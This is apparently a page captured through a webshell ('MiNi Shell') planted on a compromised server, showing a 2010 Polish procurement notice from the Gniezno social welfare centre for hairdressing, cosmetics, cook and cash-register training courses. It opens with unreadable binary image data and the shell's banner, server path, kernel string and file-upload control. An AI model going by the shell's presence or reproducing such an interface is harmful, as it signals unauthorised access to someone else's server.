JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100527/147042-N-2010.html

<p class="kh_header"><b>Gniezno: Usługa szkoleniowa dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w ramach projektu Edukacja ku samodzielności - propagowanie aktywnej integracji osób oddalonych od rynku pracy w mieście Gnieźnie współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</b><br>
<b>Numer ogłoszenia: 147042 - 2010; data zamieszczenia: 27.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Sobieskiego 20, 62-200 Gniezno, woj. wielkopolskie, tel. 0-61 426-25-81, faks 0-61 426-25-81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.gniezno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa szkoleniowa dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w ramach projektu Edukacja ku samodzielności - propagowanie aktywnej integracji osób oddalonych od rynku pracy w mieście Gnieźnie współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A.  Kurs fryzjerstwa 

Szkolenie powinno się odbywać wg następującego programu:
Zajęcia teoretyczne: 15 godzin lekcyjnych /osobę
1.	Charakteryzowanie rozwoju rzemiosła i sztuki fryzjerskiej, 1h
2.	Bezpieczeństwo i higiena pracy w salonie fryzjerskim, 1h
3.	Charakterystyka budowy i fizjologii skóry, 2h
4.	Organizowanie prac fryzjerskich, 2h
5.	Technologia fryzjerstwa i materiały fryzjerskie, 4h
6.	Stylizacja- dobór koloru włosów i fryzury do typu urody, 5h

Zajęcia praktyczne: 85 godzin zegarowych /osobę
1.	Dobieranie preparatów do pielęgnacji włosów, 2h
2.	Planowanie i wykonywanie zabiegów pielęgnacyjnych zabiegów pielęgnacyjnych, 9h
3.	Projektowanie fryzur, 7h
4.	Barwienie włosów, 10h
5.	Rozjaśnianie i odbarwianie włosów, 7h
6.	Stosowanie form kolorystycznych- baleyage, pasemka, kontrasty, 12h
7.	Stosowanie różnych form kształtowania fryzur- modelowanie włosów- nawijanie na wałki, układanie fal, modelowanie za pomocą szczotki, suszarki i fenu, prostowanie włosów,  12h
8.	Strzyżenie włosów, 12h
9.	Wykonywanie wodnej ondulacji, 6h
10.	Wykonywanie zabiegów trwałego ondulowania, 8h

Termin realizacji zamówienia:
- rozpoczęcie szkolenia powinno nastąpić nie wcześniej niż 14.06.2010r.
- zakończenie szkolenia powinno nastąpić nie później niż 06.07.2010r.
Szkolenie powinno rozpoczynać się w godzinach dopołudniowych.

Miejsce szkolenia:
Zamawiający wymaga, aby szkolenie zorganizowane było w Gnieźnie, w miejscu, do którego zapewniony jest dostęp środkami komunikacji miejskiej, a odległość od najbliższego przystanku autobusowego pozwala na dotarcie do miejsca szkolenia w ciągu 5 minut. 

Dodatkowe wymagania:
Uczestnicy szkolenia zostaną wybrani przez Zamawiającego, a Wykonawca przed rozpoczęciem szkolenia otrzyma wykaz osób skierowanych na szkolenie. W przypadku nie podjęcia przez wskazaną osobę szkolenia lub przerwanie w trakcie trwania kursu Wykonawca niezwłocznie ma obowiązek zawiadomić o tym fakcie Zamawiającego, a Zamawiający ma prawo skierować na to miejsce inną osobę.
Do realizacji szkolenia Wykonawca musi zapewnić uczestnikom kursu wszelkie niezbędne i odpowiednie materiały szkoleniowe (np. podręczniki, zeszyty, materiały piśmienne, prezentacje lub tym podobne). Materiały szkoleniowe muszą być adekwatne do treści szkolenia i opatrzone informacją o współfinansowaniu, flagą UE oraz logo Programu Operacyjnego Kapitał Ludzki (zgodnie z aktualnym Planem Komunikacji POKL 2007-2013 oraz Wytycznymi dot. oznaczania projektów w ramach POKL). Materiały powinny być przekazane każdemu uczestnikowi za pokwitowaniem na początku szkolenia bądź na bieżąco zgodnie z tematyką realizowanych zajęć. Ponadto 1 egzemplarz materiałów lub ich kserokopię Wykonawca jest zobowiązany przekazać Zamawiającemu.
Szkolenie powinno zakończyć się wydaniem zaświadczeń o jego ukończeniu opatrzone informacją o współfinansowaniu oraz logo UE, EFS i POKL. Wykonawca jest zobowiązany do przekazania Zamawiającemu kserokopii zaświadczeń potwierdzonych za zgodność z oryginałem i listy potwierdzającej odbiór w/w zaświadczeń lub certyfikatów.
	Wykonawca jest zobowiązany do pokrycia kosztów ubezpieczenia NW uczestnika szkolenia na czas szkolenia.

B.  Kurs kosmetyczny 
Szkolenie powinno się odbywać wg następującego programu:
Zajęcia teoretyczne: 22 godziny lekcyjne / osobę
1.	Podstawy przedsiębiorczości, 4h
2.	Anatomia i fizjologia, 3h
3.	Chemia kosmetyczna, 3h
4.	Dermatologia, 1h
5.	Fizykoterapia, 2h
6.	Higiena i bezpieczeństwo pracy na stanowisku, 1h
7.	Kosmetologia, 4h
8.	Anatomia Organizacja stanowisk pracy w gabinecie kosmetycznym, 2h
9.	Chemia kosmetyczna, 2h


Zajęcia praktyczne: 78 godzin zegarowych / osobę
1.	Pielęgnowanie kończyn górnych, 11h
2.	Pielęgnowanie kończyn dolnych, 5h
3.	Pielęgnowanie oczu i ich oprawy, 6h
4.	Pielęgnowanie zdrowej skóry, 9h
5.	Stosowanie zabiegów cieplnych, 10h
6.	Wykonywanie makijażu, 11h
7.	Wykonywanie masażu pielęgnacyjnego, 8h
8.	Wykonywanie usług związanych z usuwaniem zbędnego owłosienia, 8h
9.	Wykonywanie zabiegów zdobniczych paznokci, 10h

Termin realizacji zamówienia:
- rozpoczęcie szkolenia powinno nastąpić nie wcześniej niż 21.07.2010r.
- zakończenie szkolenia powinno nastąpić nie później niż 17.08.2010r.

Podział na grupy:
Szkolenie powinno się odbywać (w tym samym okresie) w podziale na dwie grupy liczące: 
I grupa 9 osób w godzinach dopołudniowych, 
II grupa 8 osób w godzinach popołudniowych.

Miejsce szkolenia:
Zamawiający wymaga, aby szkolenie zorganizowane było w Gnieźnie, w miejscu, do którego zapewniony jest dostęp środkami komunikacji miejskiej, a odległość od najbliższego przystanku autobusowego pozwala na dotarcie do miejsca szkolenia w ciągu 5 minut. 

Dodatkowe wymagania:
Uczestnicy szkolenia zostaną wybrani przez Zamawiającego, a Wykonawca przed rozpoczęciem szkolenia otrzyma wykaz osób skierowanych na szkolenie. W przypadku nie podjęcia przez wskazaną osobę szkolenia lub przerwanie w trakcie trwania kursu Wykonawca niezwłocznie ma obowiązek zawiadomić o tym fakcie Zamawiającego, a Zamawiający ma prawo skierować na to miejsce inną osobę.
Do realizacji szkolenia Wykonawca musi zapewnić uczestnikom kursu wszelkie niezbędne i odpowiednie materiały szkoleniowe (np. podręczniki, zeszyty, materiały piśmienne, prezentacje lub tym podobne). Materiały szkoleniowe muszą być adekwatne do treści szkolenia i opatrzone informacją o współfinansowaniu, flagą UE oraz logo Programu Operacyjnego Kapitał Ludzki (zgodnie z aktualnym Planem Komunikacji POKL 2007-2013 oraz Wytycznymi dot. oznaczania projektów w ramach POKL). Materiały powinny być przekazane każdemu uczestnikowi za pokwitowaniem na początku szkolenia bądź na bieżąco zgodnie z tematyką realizowanych zajęć. Ponadto 1 egzemplarz materiałów lub ich kserokopię Wykonawca jest zobowiązany przekazać Zamawiającemu.
Szkolenie powinno zakończyć się wydaniem zaświadczeń o jego ukończeniu opatrzone informacją o współfinansowaniu oraz logo UE, EFS i POKL. Wykonawca jest zobowiązany do przekazania Zamawiającemu kserokopii zaświadczeń potwierdzonych za zgodność z oryginałem i listy potwierdzającej odbiór w/w zaświadczeń lub certyfikatów.
	Wykonawca jest zobowiązany do pokrycia kosztów ubezpieczenia NW uczestnika szkolenia na czas szkolenia.

C.  Kurs przyuczający do zawodu kucharza 
Szkolenie powinno się odbywać wg następującego programu:
Zajęcia teoretyczne: 40 godzin lekcyjnych / osobę
1.	Wiadomości wstępne, 1h
- pojęcie i podział gastronomii,
- rodzaje zakładów gastronomicznych,
- zakres działalności,
2.	Organizacja zakładów gastronomicznych, wyposażenie techniczne, 3h
- działy zakładu gastronomicznego,
- magazyny żywnościowe,
- wyposażenie pomieszczeń,


3.	Zasady bezpieczeństwa i higieny pracy, 3h
- zasady dobrej praktyki higienicznej, cateringowej,
- zapisy, 
- system HARCAP,
- wymagania higieniczne dla zakładów gastronomicznych,
- wymagania dla pracowników,
4.	Potrawy z warzyw i ziemniaków, 2h
- obróbka wstępna z warzyw i ziemniaków,
- podział warzyw,
- sporządzanie surówek,
- asortyment surówek,
- gotowanie warzyw,
- asortyment z warzyw gotowanych,
- dodatki,
- potrawy z ziemniaków,
- postępowanie z produktem i wyrobem gotowym,
5.	Potrawy z grzybów, 1h
- podział grzybów,
- obróbka wstępna,
- zastosowanie w produkcji gastronomicznej,
- wpływ na zdrowie człowieka,
6.	Potrawy z owoców, 2h
- podział owoców,
- obróbka wstępna owoców,
- zastosowanie w produkcji gastronomicznej,
- wpływ na zdrowie człowieka,
7.	Potrawy z mleka, 2h
- zastosowanie mleka słodkiego w produkcji gastronomicznej,
- napoje mleczne fermentowane,
- śmietana i śmietanka,
- masło,
- sery twarogowe,
- sery dojrzewające,
8.	Potrawy z jaj, 2h
- ogólna charakterystyka potraw z jaj,
- zastosowanie jaj w produkcji gastronomicznej,
9.	Potrawy  mączne, 2h
- cechy użytkowe mąki,
- etapy produkcji ciast,
- technika wykonania ciasta makaronowego i kluskowego,
- sporządzenie pierogów i gotowanie potraw,
10.	Potrawy z kasz, 1h
- rodzaje kasz,
- obróbka wstępna kasz,
- potrawy z kasz,
- gotowanie kasz,
11.	Zupy i sosy gorące, 3h
- sporządzanie zup,
- asortyment zup,
- podział zup,
- dodatki,
- zagęszczanie zup,
- podział sosów,
- asortyment sosów,
- zastosowanie i technika wykonania,
12.	Potrawy z mięsa, 4h
- przygotowanie półproduktu,
- sporządzanie,
- asortyment potraw z mięsa,
- dodatki do mięs,
- sposób podania,
13.	Potrawy z drobiu, 3h
- przygotowanie półproduktu,
- sporządzanie, 
- asortyment potraw z drobiu,
- dodatki,
- sposób podania,
14.	Potrawy z ryb, 3h
- przygotowanie półproduktu,
- sporządzanie,
- asortyment potraw z ryb,
- dodatki,
- sposób podania,
15.	Potrawy półmięsne, 2h
- sporządzanie potraw gotowanych, smażonych, duszonych, pieczonych, zapiekanych
- asortyment potraw półmięsnych,
- dobór dodatków,
- sposób podania,
16.	Zakąski na zimno i gorące, 4h
- sporządzanie zakąsek z warzyw, mięsa, drobiu i ryb,
- zasady dekoracji, zdobienia zakąsek,
17.	Napoje zimne i gorące, 2h
- pojęcie i podział napojów,
- technika sporządzania,
- asortyment,
- technika podania,
- dekoracja,

Zajęcia praktyczne: 110 godzin zegarowych / osobę
1.	Potrawy jarskie, 3h
2.	Potrawy z ziemniaków, 3h
3.	Zakąski z warzyw, 3h
4.	Sałatki, 4h
5.	Potrawy z grzybów, 3h
6.	Potrawy z owoców, 3h
7.	Potrawy z jaj, 3h
8.	Zakąski z jaj, 3h
9.	Potrawy z mleka i przetworów mlecznych, 4h
10.	Ciasta makaronowe i sosy gorące, 5h
11.	Naleśniki, 3h
12.	Ciasto ziemniaczane i serowe, 4h
13.	Potrawy z kasz, 3h
14.	Zupy, 5h
15.	Mięsa gotowane, 4h
16.	Mięsa duszone, 5h
17.	Mięsa smażone, 4h
18.	Mięsa pieczone, 4h
19.	Podroby, 3h
20.	Potrawy z grila, 4h


21.	Zakąski z mięsa, 5h
22.	Drób gotowany, 3h
23.	Drób duszony, 5h
24.	Drób smażony, 3h
25.	Drób pieczony, 3h
26.	Zakąski z drobiu, 5h
27.	Potrawy z ryb, 3h
28.	Zakąski z ryb, 4h
29.	Potrawy ze śledzi, 3h
30.	Potrawy półmięsne, 3h

Termin realizacji zamówienia:
- rozpoczęcie szkolenia powinno nastąpić nie wcześniej niż 23.08.2010r.
- zakończenie szkolenia powinno nastąpić nie później niż 24.09.2010r.

Miejsce szkolenia:
	Zamawiający wymaga, aby szkolenie zorganizowane było w Gnieźnie, w miejscu, do którego zapewniony jest dostęp środkami komunikacji miejskiej, a odległość od najbliższego przystanku autobusowego pozwala na dotarcie do miejsca szkolenia w ciągu 5 minut. 

Dodatkowe wymagania:
	Uczestnicy szkolenia zostaną wybrani przez Zamawiającego, a Wykonawca przed rozpoczęciem szkolenia otrzyma wykaz osób skierowanych na szkolenie. W przypadku nie podjęcia przez wskazaną osobę szkolenia lub przerwanie w trakcie trwania kursu Wykonawca niezwłocznie ma obowiązek zawiadomić o tym fakcie Zamawiającego, a Zamawiający ma prawo skierować na to miejsce inną osobę.
Do realizacji szkolenia Wykonawca musi zapewnić uczestnikom kursu wszelkie niezbędne i odpowiednie materiały szkoleniowe (np. podręczniki, zeszyty, materiały piśmienne, prezentacje lub tym podobne). Materiały szkoleniowe muszą być adekwatne do treści szkolenia i opatrzone informacją o współfinansowaniu, flagą UE oraz logo Programu Operacyjnego Kapitał Ludzki (zgodnie z aktualnym Planem Komunikacji POKL 2007-2013 oraz Wytycznymi dot. oznaczania projektów w ramach POKL). Materiały powinny być przekazane każdemu uczestnikowi za pokwitowaniem na początku szkolenia bądź na bieżąco zgodnie z tematyką realizowanych zajęć. Ponadto 1 egzemplarz materiałów lub ich kserokopię Wykonawca jest zobowiązany przekazać Zamawiającemu.
	Wykonawca zobowiązany jest do pokrycia kosztów koniecznych badań lekarskich i innych badań niezbędnych do uzyskania zdolności do uczestniczenia w kursie przygotowującym do zawodu kucharza.
Szkolenie powinno zakończyć się wydaniem zaświadczeń o jego ukończeniu opatrzone informacją o współfinansowaniu oraz logo UE, EFS i POKL. Wykonawca jest zobowiązany do przekazania Zamawiającemu kserokopii zaświadczeń potwierdzonych za zgodność z oryginałem i listy potwierdzającej odbiór w/w zaświadczeń lub certyfikatów.
Wykonawca jest zobowiązany do pokrycia kosztów ubezpieczenia NW uczestnika szkolenia na czas szkolenia.

D.  Kurs obsługi kasy fiskalnej 

Szkolenie powinno się odbywać wg następującego programu:
Zajęcia teoretyczne: 20 godzin/ osobę
1.	Produkt i cena - 6h
2. Aktywne metody sprzedaży - 7h
3. Przepisy BHP i P.poż- 2h
4. Obsługa kas fiskalnych - część teoretyczna-  5h

B. Zajęcia praktyczne: 10 godzin/ osobę
1. Obsługa kas fiskalnych - część teoretyczna- 10h

Podział na grupy:
Szkolenie powinno się odbywać w podziale na 3 grupy liczące średnio 8 osób.

Termin realizacji zamówienia:
- rozpoczęcie szkolenia powinno nastąpić nie wcześniej niż 28.10.2010r.
- zakończenie szkolenia powinno nastąpić nie później niż 12.11.2010r.

Zajęcia dla I grupy powinny się odbyć w terminie od 28.10.2010r. - 02.11.2010r.
Zajęcia dla II grupy powinny się odbywać w terminie od 03.11.2010r. - 06.11.2010r.
Zajęcia dla III grupy powinny się odbywać w terminie od 08.11.2010r. - 12.11.2010r.

Miejsce szkolenia:
Zamawiający wymaga, aby szkolenie zorganizowane było w Gnieźnie, w miejscu, do którego zapewniony jest dostęp środkami komunikacji miejskiej, a odległość od najbliższego przystanku autobusowego pozwala na dotarcie do miejsca szkolenia w ciągu 5 minut. 

Dodatkowe wymagania:
Uczestnicy szkolenia zostaną wybrani przez Zamawiającego, a Wykonawca przed rozpoczęciem szkolenia otrzyma wykaz osób skierowanych na szkolenie. W przypadku nie podjęcia przez wskazaną osobę szkolenia lub przerwanie w trakcie trwania kursu Wykonawca niezwłocznie ma obowiązek zawiadomić o tym fakcie Zamawiającego, a Zamawiający ma prawo skierować na to miejsce inną osobę.
Do realizacji szkolenia Wykonawca musi zapewnić uczestnikom kursu wszelkie niezbędne i odpowiednie materiały szkoleniowe (np. podręczniki, zeszyty, materiały piśmienne, prezentacje lub tym podobne). Materiały szkoleniowe muszą być adekwatne do treści szkolenia i opatrzone informacją o współfinansowaniu, flagą UE oraz logo Programu Operacyjnego Kapitał Ludzki (zgodnie z aktualnym Planem Komunikacji POKL 2007-2013 oraz Wytycznymi dot. oznaczania projektów w ramach POKL). Materiały powinny być przekazane każdemu uczestnikowi za pokwitowaniem na początku szkolenia bądź na bieżąco zgodnie z tematyką realizowanych zajęć. Ponadto 1 egzemplarz materiałów lub ich kserokopię Wykonawca jest zobowiązany przekazać Zamawiającemu.
	Szkolenie powinno zakończyć się wydaniem zaświadczeń o jego ukończeniu opatrzone informacją o współfinansowaniu oraz logo UE, EFS i POKL. Wykonawca jest zobowiązany do przekazania Zamawiającemu kserokopii zaświadczeń potwierdzonych za zgodność z oryginałem i listy potwierdzającej odbiór w/w zaświadczeń lub certyfikatów.
Wykonawca jest zobowiązany do pokrycia kosztów ubezpieczenia NW uczestnika szkolenia na czas szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>dot. zwiększenia ilości osób, które stanowić mogą nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 14.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja posiadania uprawnień do wykonywania określonej działalności lub czynności polegać będzie w oparciu o Zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez właściwy ze względu na siedzibę instytucji Wojewódzki Urząd Pracy aktualne na rok złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku weryfikacji warunku posiadania doświadczenia i wiedzy Zamawiający wymaga przeprowadzenie co najmniej jednego szkolenia w zakresie zagadnień będących przedmiotem zamówienia. Warunek ten oceniany będzie na podstawie wykazu zrealizowanych szkoleń metodą warunku granicznego - spełnia/niespełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku weryfikacji warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający będzie oceniać posiadane wykształcenie (dot. trzech kursów: Kursu fryzjerskiego, kosmetycznego i przyuczającego do zawodu kucharza), kwalifikacje (dot. kursu obsługi kasy fiskalnej)  i liczbę przeprowadzonych szkoleń w zakresie zagadnień będących przedmiotem zamówienia (dot. tylko Kursu obsługi kasy fiskalnej) na podstawie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności metodą warunku granicznego - spełnia/niespełnia.
Osoby wskazane do przeprowadzenia szkolenia muszą posiadać:
- wykształcenie co najmniej zawodowe  o kierunku ściśle związanym z przedmiotem zamówienia w przypadku:
a.	Kursu fryzjerstwa - kierunek fryzjerstwo
b.	Kursu kosmetycznego - kierunek kosmetyka
c.	Kursu przyuczającego do zawodu kucharza - kierunek gastronomiczny.
- w przypadku Kursu obsługi kasy fiskalnej doświadczenie w przeprowadzonych min. 2 szkoleniach w zakresie zagadnień będących przedmiotem zamówienia, w okresie ostatnich 3 lat przed upływem terminu składania ofert, oraz ukończony kurs pedagogiczny.
 W wykazie należy wpisać tylko osoby spełniające podane warunki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

